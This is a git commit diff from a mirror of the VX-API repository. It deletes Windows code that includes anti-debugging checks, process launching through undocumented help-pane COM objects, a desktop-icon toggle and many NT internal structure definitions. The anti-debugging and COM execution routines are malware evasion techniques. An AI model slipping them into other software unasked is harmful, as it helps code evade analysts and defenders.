mirror of https://github.com/vxunderground/VX-API
update
This commit is contained in:
parent
8f5eca39d2
commit
86ca3658a5
|
@ -0,0 +1,5 @@
|
|||
|
||||
*.obj
|
||||
*.tlog
|
||||
x64/Debug/VX-API.exe
|
||||
*.pdb
|
|
@ -1,22 +0,0 @@
|
|||
/*
|
||||
If a process is running under a debugger and an invalid handle is passed to the ntdll!NtClose() or kernel32!CloseHandle()
|
||||
function, then the EXCEPTION_INVALID_HANDLE (0xC0000008) exception will be raised. The exception can be cached by
|
||||
an exception handler. If the control is passed to the exception handler, it indicates that a debugger is present.
|
||||
|
||||
Credit: Checkpoint Research
|
||||
|
||||
*/
|
||||
BOOL AdfCloseHandleOnInvalidAddress(VOID)
|
||||
{
|
||||
__try
|
||||
{
|
||||
CloseHandle((HANDLE)0xDEADBEEF);
|
||||
return FALSE;
|
||||
}
|
||||
__except (EXCEPTION_INVALID_HANDLE == GetExceptionCode() ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
|
||||
{
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
|
@ -1,31 +0,0 @@
|
|||
/*
|
||||
|
||||
When the CREATE_PROCESS_DEBUG_EVENT event occurs, the handle of the debugged file is stored in
|
||||
the CREATE_PROCESS_DEBUG_INFO structure. Therefore, debuggers can read the debug information
|
||||
from this file. If this handle is not closed by the debugger, the file won’t be opened with
|
||||
exclusive access. Some debuggers can forget to close the handle.
|
||||
|
||||
This trick uses kernel32!CreateFileW() (or kernel32!CreateFileA()) to exclusively open the
|
||||
file of the current process. If the call fails, we can consider that the current process is being
|
||||
run in the presence of a debugger.
|
||||
|
||||
Credit: Checkpoint Research
|
||||
*/
|
||||
|
||||
BOOL AdfIsCreateProcessDebugEventCodeSet(VOID)
|
||||
{
|
||||
WCHAR FilePath[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
if (GetInMemoryModulePathFromProcessParametersW((MAX_PATH * sizeof(WCHAR)), FilePath) == 0)
|
||||
return FALSE;
|
||||
|
||||
hHandle = CreateFileW(FilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
return TRUE;
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return FALSE;
|
||||
}
|
|
@ -1,4 +0,0 @@
|
|||
BOOL RfIsDebuggerPresent(VOID)
|
||||
{
|
||||
return GetPeb()->BeingDebugged;
|
||||
}
|
|
@ -1,53 +0,0 @@
|
|||
/*
|
||||
Paper: Finding Interactive User COM Objects using PowerShell
|
||||
|
||||
Credit: James Forshaw
|
||||
*/
|
||||
|
||||
struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}"))
|
||||
IHxHelpPaneServer : public IUnknown {
|
||||
virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
|
||||
};
|
||||
|
||||
HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
|
||||
return Result;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
|
||||
return Result;
|
||||
|
||||
return Result;
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(PWCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxHelpPaneServer;
|
||||
GUID IID_IHxHelpPaneServer;
|
||||
|
||||
IHxHelpPaneServer* Help = NULL;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
Result = Help->Execute(UriFile);
|
||||
|
||||
if (Help)
|
||||
Help->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return EhWin32FromHResult(Result);
|
||||
}
|
|
@ -1,49 +0,0 @@
|
|||
/*
|
||||
Paper: Finding Interactive User COM Objects using PowerShell
|
||||
|
||||
Credit: James Forshaw
|
||||
*/
|
||||
|
||||
struct __declspec(uuid("8cec595b-07a1-11d9-b15e-000d56bfe6ee"))
|
||||
IHxInteractiveUser : public IUnknown {
|
||||
virtual VOID __stdcall Execute(PWCHAR pcUrl) = 0;
|
||||
};
|
||||
|
||||
HRESULT CoInitializeIHxInteractiveUserIds(LPGUID Clsid, LPGUID Iid)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58e7-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
|
||||
return Result;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec595b-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
|
||||
return Result;
|
||||
|
||||
return Result;
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(PWCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxInteractiveUser;
|
||||
GUID IID_IHxInteractiveUser;
|
||||
IHxInteractiveUser* User = NULL;
|
||||
|
||||
if(!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
User->Execute(UriFile);
|
||||
|
||||
if (User)
|
||||
User->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return EhWin32FromHResult(Result);
|
||||
}
|
|
@ -1,117 +0,0 @@
|
|||
/*
|
||||
If the desktop icons are visible, makes them invisible
|
||||
If the desktop icons are invisible, makes them visible
|
||||
*/
|
||||
|
||||
DWORD UnusedSubroutineInterfaceQueryDesktopView(REFIID Riid, PVOID* Pp)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
HRESULT Result = S_OK;
|
||||
IShellWindows* ShellWindows = NULL;
|
||||
IShellBrowser* Browser = NULL;
|
||||
IShellView* View = NULL;
|
||||
CComVariant Desktop(CSIDL_DESKTOP); //initialize
|
||||
CComVariant IDisposeObject;
|
||||
IDispatch* Dispatch = NULL;
|
||||
IServiceProvider* Provider = NULL;
|
||||
|
||||
Result = CoCreateInstance(CLSID_ShellWindows, NULL, CLSCTX_ALL, IID_IShellWindows, (VOID**)(&ShellWindows));
|
||||
if (!SUCCEEDED(Result))
|
||||
return EhWin32FromHResult(Result);
|
||||
|
||||
dwError = 0;
|
||||
Result = ShellWindows->FindWindowSW(&Desktop, &IDisposeObject, SWC_DESKTOP, (PLONG)&dwError, SWFO_NEEDDISPATCH, &Dispatch);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto FAILURE;
|
||||
else
|
||||
dwError = ERROR_SUCCESS;
|
||||
|
||||
Result = Dispatch->QueryInterface(IID_IServiceProvider, (VOID**)&Provider);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto FAILURE;
|
||||
|
||||
Result = Provider->QueryService(SID_STopLevelBrowser, IID_PPV_ARGS(&Browser));
|
||||
if (!SUCCEEDED(Result))
|
||||
goto FAILURE;
|
||||
|
||||
Result = Browser->QueryActiveShellView(&View);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto FAILURE;
|
||||
|
||||
Result = View->QueryInterface(Riid, Pp);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto FAILURE;
|
||||
|
||||
if (Provider)
|
||||
Provider->Release();
|
||||
|
||||
if (Browser)
|
||||
Browser->Release();
|
||||
|
||||
if (View)
|
||||
View->Release();
|
||||
|
||||
if (ShellWindows)
|
||||
ShellWindows->Release();
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE:
|
||||
|
||||
dwError = EhWin32FromHResult(Result);
|
||||
|
||||
if (Provider)
|
||||
Provider->Release();
|
||||
|
||||
if (Browser)
|
||||
Browser->Release();
|
||||
|
||||
if (View)
|
||||
View->Release();
|
||||
|
||||
if (ShellWindows)
|
||||
ShellWindows->Release();
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
BOOL MpfComHideDesktopIconsToggle(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
HRESULT Result = S_OK;
|
||||
IFolderView2* FolderView2 = NULL;
|
||||
|
||||
if (CoInitialize(NULL) != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
dwError = UnusedSubroutineInterfaceQueryDesktopView(IID_PPV_ARGS(&FolderView2));
|
||||
if (dwError != ERROR_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
dwError = 0;
|
||||
Result = FolderView2->GetCurrentFolderFlags(&dwError);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FolderView2->SetCurrentFolderFlags(FWF_NOICONS, dwError ^ FWF_NOICONS);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (FolderView2)
|
||||
FolderView2->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
dwError = EhWin32FromHResult(Result);
|
||||
|
||||
if (FolderView2)
|
||||
FolderView2->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return dwError;
|
||||
}
|
|
@ -1,23 +0,0 @@
|
|||
DWORD DecimalToAsciiA(PCHAR String, LPDWORD dwArray, DWORD dwLength)
|
||||
{
|
||||
DWORD dwX = ERROR_SUCCESS;
|
||||
|
||||
if (String == NULL)
|
||||
return dwX;
|
||||
|
||||
for (; dwX < dwLength; dwX++) { String[dwX] = (CHAR)dwArray[dwX]; }
|
||||
|
||||
return dwX;
|
||||
}
|
||||
|
||||
DWORD DecimalToAsciiW(PWCHAR String, LPDWORD dwArray, DWORD dwLength)
|
||||
{
|
||||
DWORD dwX = ERROR_SUCCESS;
|
||||
|
||||
if (String == NULL)
|
||||
return dwX;
|
||||
|
||||
for (; dwX < dwLength; dwX++) { String[dwX] = (WCHAR)dwArray[dwX]; }
|
||||
|
||||
return dwX;
|
||||
}
|
|
@ -1,7 +0,0 @@
|
|||
typedef struct _ACTIVATION_CONTEXT_STACK {
|
||||
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
|
||||
LIST_ENTRY FrameListCache;
|
||||
ULONG Flags;
|
||||
ULONG NextCookieSequenceNumber;
|
||||
ULONG StackId;
|
||||
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
|
|
@ -1,5 +0,0 @@
|
|||
typedef struct _STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PCHAR Buffer;
|
||||
} ANSI_STRING, * PANSI_STRING;
|
|
@ -1,4 +0,0 @@
|
|||
typedef struct __CLIENT_ID {
|
||||
HANDLE UniqueProcess;
|
||||
HANDLE UniqueThread;
|
||||
}CLIENT_ID, * PCLIENT_ID;
|
|
@ -1,4 +0,0 @@
|
|||
typedef struct _CURDIR {
|
||||
UNICODE_STRING DosPath;
|
||||
PVOID Handle;
|
||||
}CURDIR, * PCURDIR;
|
|
@ -1,5 +0,0 @@
|
|||
typedef struct _GDI_TEB_BATCH {
|
||||
ULONG Offset;
|
||||
ULONG HDC;
|
||||
ULONG Buffer[310];
|
||||
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
|
|
@ -1,6 +0,0 @@
|
|||
typedef struct _KSYSTEM_TIME
|
||||
{
|
||||
ULONG LowPart;
|
||||
LONG High1Time;
|
||||
LONG High2Time;
|
||||
} KSYSTEM_TIME, * PKSYSTEM_TIME;
|
|
@ -1,118 +0,0 @@
|
|||
typedef struct _KUSER_SHARED_DATA {
|
||||
ULONG TickCountLowDeprecated;
|
||||
ULONG TickCountMultiplier;
|
||||
KSYSTEM_TIME InterruptTime;
|
||||
KSYSTEM_TIME SystemTime;
|
||||
KSYSTEM_TIME TimeZoneBias;
|
||||
USHORT ImageNumberLow;
|
||||
USHORT ImageNumberHigh;
|
||||
WCHAR NtSystemRoot[260];
|
||||
ULONG MaxStackTraceDepth;
|
||||
ULONG CryptoExponent;
|
||||
ULONG TimeZoneId;
|
||||
ULONG LargePageMinimum;
|
||||
ULONG AitSamplingValue;
|
||||
ULONG AppCompatFlag;
|
||||
ULONGLONG RNGSeedVersion;
|
||||
ULONG GlobalValidationRunlevel;
|
||||
LONG TimeZoneBiasStamp;
|
||||
ULONG NtBuildNumber;
|
||||
NT_PRODUCT_TYPE NtProductType;
|
||||
BOOLEAN ProductTypeIsValid;
|
||||
BOOLEAN Reserved0[1];
|
||||
USHORT NativeProcessorArchitecture;
|
||||
ULONG NtMajorVersion;
|
||||
ULONG NtMinorVersion;
|
||||
BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
|
||||
ULONG Reserved1;
|
||||
ULONG Reserved3;
|
||||
ULONG TimeSlip;
|
||||
ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
|
||||
ULONG BootId;
|
||||
LARGE_INTEGER SystemExpirationDate;
|
||||
ULONG SuiteMask;
|
||||
BOOLEAN KdDebuggerEnabled;
|
||||
union {
|
||||
UCHAR MitigationPolicies;
|
||||
struct {
|
||||
UCHAR NXSupportPolicy : 2;
|
||||
UCHAR SEHValidationPolicy : 2;
|
||||
UCHAR CurDirDevicesSkippedForDlls : 2;
|
||||
UCHAR Reserved : 2;
|
||||
};
|
||||
};
|
||||
USHORT CyclesPerYield;
|
||||
ULONG ActiveConsoleId;
|
||||
ULONG DismountCount;
|
||||
ULONG ComPlusPackage;
|
||||
ULONG LastSystemRITEventTickCount;
|
||||
ULONG NumberOfPhysicalPages;
|
||||
BOOLEAN SafeBootMode;
|
||||
UCHAR VirtualizationFlags;
|
||||
UCHAR Reserved12[2];
|
||||
union {
|
||||
ULONG SharedDataFlags;
|
||||
struct {
|
||||
ULONG DbgErrorPortPresent : 1;
|
||||
ULONG DbgElevationEnabled : 1;
|
||||
ULONG DbgVirtEnabled : 1;
|
||||
ULONG DbgInstallerDetectEnabled : 1;
|
||||
ULONG DbgLkgEnabled : 1;
|
||||
ULONG DbgDynProcessorEnabled : 1;
|
||||
ULONG DbgConsoleBrokerEnabled : 1;
|
||||
ULONG DbgSecureBootEnabled : 1;
|
||||
ULONG DbgMultiSessionSku : 1;
|
||||
ULONG DbgMultiUsersInSessionSku : 1;
|
||||
ULONG DbgStateSeparationEnabled : 1;
|
||||
ULONG SpareBits : 21;
|
||||
} DUMMYSTRUCTNAME2;
|
||||
} DUMMYUNIONNAME2;
|
||||
ULONG DataFlagsPad[1];
|
||||
ULONGLONG TestRetInstruction;
|
||||
LONGLONG QpcFrequency;
|
||||
ULONG SystemCall;
|
||||
ULONG Reserved2;
|
||||
ULONGLONG SystemCallPad[2];
|
||||
union {
|
||||
KSYSTEM_TIME TickCount;
|
||||
ULONG64 TickCountQuad;
|
||||
struct {
|
||||
ULONG ReservedTickCountOverlay[3];
|
||||
ULONG TickCountPad[1];
|
||||
} DUMMYSTRUCTNAME;
|
||||
} DUMMYUNIONNAME3;
|
||||
ULONG Cookie;
|
||||
ULONG CookiePad[1];
|
||||
LONGLONG ConsoleSessionForegroundProcessId;
|
||||
ULONGLONG TimeUpdateLock;
|
||||
ULONGLONG BaselineSystemTimeQpc;
|
||||
ULONGLONG BaselineInterruptTimeQpc;
|
||||
ULONGLONG QpcSystemTimeIncrement;
|
||||
ULONGLONG QpcInterruptTimeIncrement;
|
||||
UCHAR QpcSystemTimeIncrementShift;
|
||||
UCHAR QpcInterruptTimeIncrementShift;
|
||||
USHORT UnparkedProcessorCount;
|
||||
ULONG EnclaveFeatureMask[4];
|
||||
ULONG TelemetryCoverageRound;
|
||||
USHORT UserModeGlobalLogger[16];
|
||||
ULONG ImageFileExecutionOptions;
|
||||
ULONG LangGenerationCount;
|
||||
ULONGLONG Reserved4;
|
||||
ULONGLONG InterruptTimeBias;
|
||||
ULONGLONG QpcBias;
|
||||
ULONG ActiveProcessorCount;
|
||||
UCHAR ActiveGroupCount;
|
||||
UCHAR Reserved9;
|
||||
union {
|
||||
USHORT QpcData;
|
||||
struct {
|
||||
UCHAR QpcBypassEnabled;
|
||||
UCHAR QpcShift;
|
||||
};
|
||||
};
|
||||
LARGE_INTEGER TimeZoneBiasEffectiveStart;
|
||||
LARGE_INTEGER TimeZoneBiasEffectiveEnd;
|
||||
XSTATE_CONFIGURATION XState;
|
||||
KSYSTEM_TIME FeatureConfigurationChangeStamp;
|
||||
ULONG Spare;
|
||||
} KUSER_SHARED_DATA, * PKUSER_SHARED_DATA;
|
|
@ -1,15 +0,0 @@
|
|||
typedef struct _LDR_MODULE {
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
PVOID BaseAddress;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
SHORT LoadCount;
|
||||
SHORT TlsIndex;
|
||||
LIST_ENTRY HashTableEntry;
|
||||
ULONG TimeDateStamp;
|
||||
} LDR_MODULE, * PLDR_MODULE;
|
|
@ -1,56 +0,0 @@
|
|||
typedef struct _PEB {
|
||||
BOOLEAN InheritedAddressSpace;
|
||||
BOOLEAN ReadImageFileExecOptions;
|
||||
BOOLEAN BeingDebugged;
|
||||
BOOLEAN Spare;
|
||||
HANDLE Mutant;
|
||||
PVOID ImageBase;
|
||||
PPEB_LDR_DATA LoaderData;
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
|
||||
PVOID SubSystemData;
|
||||
PVOID ProcessHeap;
|
||||
PVOID FastPebLock;
|
||||
PVOID FastPebLockRoutine;
|
||||
PVOID FastPebUnlockRoutine;
|
||||
ULONG EnvironmentUpdateCount;
|
||||
PVOID* KernelCallbackTable;
|
||||
PVOID EventLogSection;
|
||||
PVOID EventLog;
|
||||
PVOID FreeList;
|
||||
ULONG TlsExpansionCounter;
|
||||
PVOID TlsBitmap;
|
||||
ULONG TlsBitmapBits[0x2];
|
||||
PVOID ReadOnlySharedMemoryBase;
|
||||
PVOID ReadOnlySharedMemoryHeap;
|
||||
PVOID* ReadOnlyStaticServerData;
|
||||
PVOID AnsiCodePageData;
|
||||
PVOID OemCodePageData;
|
||||
PVOID UnicodeCaseTableData;
|
||||
ULONG NumberOfProcessors;
|
||||
ULONG NtGlobalFlag;
|
||||
BYTE Spare2[0x4];
|
||||
LARGE_INTEGER CriticalSectionTimeout;
|
||||
ULONG HeapSegmentReserve;
|
||||
ULONG HeapSegmentCommit;
|
||||
ULONG HeapDeCommitTotalFreeThreshold;
|
||||
ULONG HeapDeCommitFreeBlockThreshold;
|
||||
ULONG NumberOfHeaps;
|
||||
ULONG MaximumNumberOfHeaps;
|
||||
PVOID** ProcessHeaps;
|
||||
PVOID GdiSharedHandleTable;
|
||||
PVOID ProcessStarterHelper;
|
||||
PVOID GdiDCAttributeList;
|
||||
PVOID LoaderLock;
|
||||
ULONG OSMajorVersion;
|
||||
ULONG OSMinorVersion;
|
||||
ULONG OSBuildNumber;
|
||||
ULONG OSPlatformId;
|
||||
ULONG ImageSubSystem;
|
||||
ULONG ImageSubSystemMajorVersion;
|
||||
ULONG ImageSubSystemMinorVersion;
|
||||
ULONG GdiHandleBuffer[0x22];
|
||||
ULONG PostProcessInitRoutine;
|
||||
ULONG TlsExpansionBitmap;
|
||||
BYTE TlsExpansionBitmapBits[0x80];
|
||||
ULONG SessionId;
|
||||
} PEB, * PPEB;
|
|
@ -1,8 +0,0 @@
|
|||
typedef struct _PEB_LDR_DATA {
|
||||
ULONG Length;
|
||||
ULONG Initialized;
|
||||
PVOID SsHandle;
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
|
@ -1,7 +0,0 @@
|
|||
typedef PVOID PACTIVATION_CONTEXT;
|
||||
|
||||
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
|
||||
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
|
||||
PACTIVATION_CONTEXT ActivationContext;
|
||||
ULONG Flags;
|
||||
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
|
|
@ -1,6 +0,0 @@
|
|||
typedef struct _RTL_DRIVE_LETTER_CURDIR {
|
||||
WORD Flags;
|
||||
WORD Length;
|
||||
ULONG TimeStamp;
|
||||
ANSI_STRING DosPath;
|
||||
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
|
|
@ -1,31 +0,0 @@
|
|||
typedef struct _RTL_USER_PROCESS_PARAMETERS {
|
||||
ULONG MaximumLength;
|
||||
ULONG Length;
|
||||
ULONG Flags;
|
||||
ULONG DebugFlags;
|
||||
PVOID ConsoleHandle;
|
||||
ULONG ConsoleFlags;
|
||||
PVOID StandardInput;
|
||||
PVOID StandardOutput;
|
||||
PVOID StandardError;
|
||||
CURDIR CurrentDirectory;
|
||||
UNICODE_STRING DllPath;
|
||||
UNICODE_STRING ImagePathName;
|
||||
UNICODE_STRING CommandLine;
|
||||
PVOID Environment;
|
||||
ULONG StartingX;
|
||||
ULONG StartingY;
|
||||
ULONG CountX;
|
||||
ULONG CountY;
|
||||
ULONG CountCharsX;
|
||||
ULONG CountCharsY;
|
||||
ULONG FillAttribute;
|
||||
ULONG WindowFlags;
|
||||
ULONG ShowWindowFlags;
|
||||
UNICODE_STRING WindowTitle;
|
||||
UNICODE_STRING DesktopInfo;
|
||||
UNICODE_STRING ShellInfo;
|
||||
UNICODE_STRING RuntimeData;
|
||||
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
|
||||
ULONG EnvironmentSize;
|
||||
}RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
|
159
Structures/TEB.h
159
Structures/TEB.h
|
@ -1,159 +0,0 @@
|
|||
typedef struct _TEB
|
||||
{
|
||||
NT_TIB NtTib;
|
||||
PVOID EnvironmentPointer;
|
||||
CLIENT_ID ClientId;
|
||||
PVOID ActiveRpcHandle;
|
||||
PVOID ThreadLocalStoragePointer;
|
||||
PPEB ProcessEnvironmentBlock;
|
||||
ULONG LastErrorValue;
|
||||
ULONG CountOfOwnedCriticalSections;
|
||||
PVOID CsrClientThread;
|
||||
PVOID Win32ThreadInfo;
|
||||
ULONG User32Reserved[26];
|
||||
ULONG UserReserved[5];
|
||||
PVOID WOW32Reserved;
|
||||
LCID CurrentLocale;
|
||||
ULONG FpSoftwareStatusRegister;
|
||||
PVOID SystemReserved1[54];
|
||||
LONG ExceptionCode;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
|
||||
ULONG TxFsContext;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
|
||||
#else
|
||||
ACTIVATION_CONTEXT_STACK ActivationContextStack;
|
||||
UCHAR SpareBytes1[24];
|
||||
#endif
|
||||
GDI_TEB_BATCH GdiTebBatch;
|
||||
CLIENT_ID RealClientId;
|
||||
PVOID GdiCachedProcessHandle;
|
||||
ULONG GdiClientPID;
|
||||
ULONG GdiClientTID;
|
||||
PVOID GdiThreadLocalInfo;
|
||||
PSIZE_T Win32ClientInfo[62];
|
||||
PVOID glDispatchTable[233];
|
||||
PSIZE_T glReserved1[29];
|
||||
PVOID glReserved2;
|
||||
PVOID glSectionInfo;
|
||||
PVOID glSection;
|
||||
PVOID glTable;
|
||||
PVOID glCurrentRC;
|
||||
PVOID glContext;
|
||||
NTSTATUS LastStatusValue;
|
||||
UNICODE_STRING StaticUnicodeString;
|
||||
WCHAR StaticUnicodeBuffer[261];
|
||||
PVOID DeallocationStack;
|
||||
PVOID TlsSlots[64];
|
||||
LIST_ENTRY TlsLinks;
|
||||
PVOID Vdm;
|
||||
PVOID ReservedForNtRpc;
|
||||
PVOID DbgSsReserved[2];
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG HardErrorMode;
|
||||
#else
|
||||
ULONG HardErrorsAreDisabled;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
|
||||
GUID ActivityId;
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
PVOID EtwTraceData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID Instrumentation[14];
|
||||
PVOID SubProcessTag;
|
||||
PVOID EtwLocalData;
|
||||
#else
|
||||
PVOID Instrumentation[16];
|
||||
#endif
|
||||
PVOID WinSockData;
|
||||
ULONG GdiBatchCount;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
BOOLEAN SpareBool0;
|
||||
BOOLEAN SpareBool1;
|
||||
BOOLEAN SpareBool2;
|
||||
#else
|
||||
BOOLEAN InDbgPrint;
|
||||
BOOLEAN FreeStackOnTermination;
|
||||
BOOLEAN HasFiberData;
|
||||
#endif
|
||||
UCHAR IdealProcessor;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG GuaranteedStackBytes;
|
||||
#else
|
||||
ULONG Spare3;
|
||||
#endif
|
||||
PVOID ReservedForPerf;
|
||||
PVOID ReservedForOle;
|
||||
ULONG WaitingOnLoaderLock;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID SavedPriorityState;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR ThreadPoolData;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
ULONG_PTR SparePointer1;
|
||||
ULONG_PTR SoftPatchPtr1;
|
||||
ULONG_PTR SoftPatchPtr2;
|
||||
#else
|
||||
Wx86ThreadState Wx86Thread;
|
||||
#endif
|
||||
PVOID* TlsExpansionSlots;
|
||||
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
|
||||
PVOID DeallocationBStore;
|
||||
PVOID BStoreLimit;
|
||||
#endif
|
||||
ULONG ImpersonationLocale;
|
||||
ULONG IsImpersonating;
|
||||
PVOID NlsCache;
|
||||
PVOID pShimData;
|
||||
ULONG HeapVirtualAffinity;
|
||||
HANDLE CurrentTransactionHandle;
|
||||
PTEB_ACTIVE_FRAME ActiveFrame;
|
||||
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PVOID FlsData;
|
||||
#endif
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PVOID PreferredLangauges;
|
||||
PVOID UserPrefLanguages;
|
||||
PVOID MergedPrefLanguages;
|
||||
ULONG MuiImpersonation;
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT SpareCrossTebFlags : 16;
|
||||
};
|
||||
USHORT CrossTebFlags;
|
||||
};
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT DbgSafeThunkCall : 1;
|
||||
USHORT DbgInDebugPrint : 1;
|
||||
USHORT DbgHasFiberData : 1;
|
||||
USHORT DbgSkipThreadAttach : 1;
|
||||
USHORT DbgWerInShipAssertCode : 1;
|
||||
USHORT DbgIssuedInitialBp : 1;
|
||||
USHORT DbgClonedThread : 1;
|
||||
USHORT SpareSameTebBits : 9;
|
||||
};
|
||||
USHORT SameTebFlags;
|
||||
};
|
||||
PVOID TxnScopeEntercallback;
|
||||
PVOID TxnScopeExitCAllback;
|
||||
PVOID TxnScopeContext;
|
||||
ULONG LockCount;
|
||||
ULONG ProcessRundown;
|
||||
ULONG64 LastSwitchTime;
|
||||
ULONG64 TotalSwitchOutTime;
|
||||
LARGE_INTEGER WaitReasonBitMap;
|
||||
#else
|
||||
BOOLEAN SafeThunkCall;
|
||||
BOOLEAN BooleanSpare[3];
|
||||
#endif
|
||||
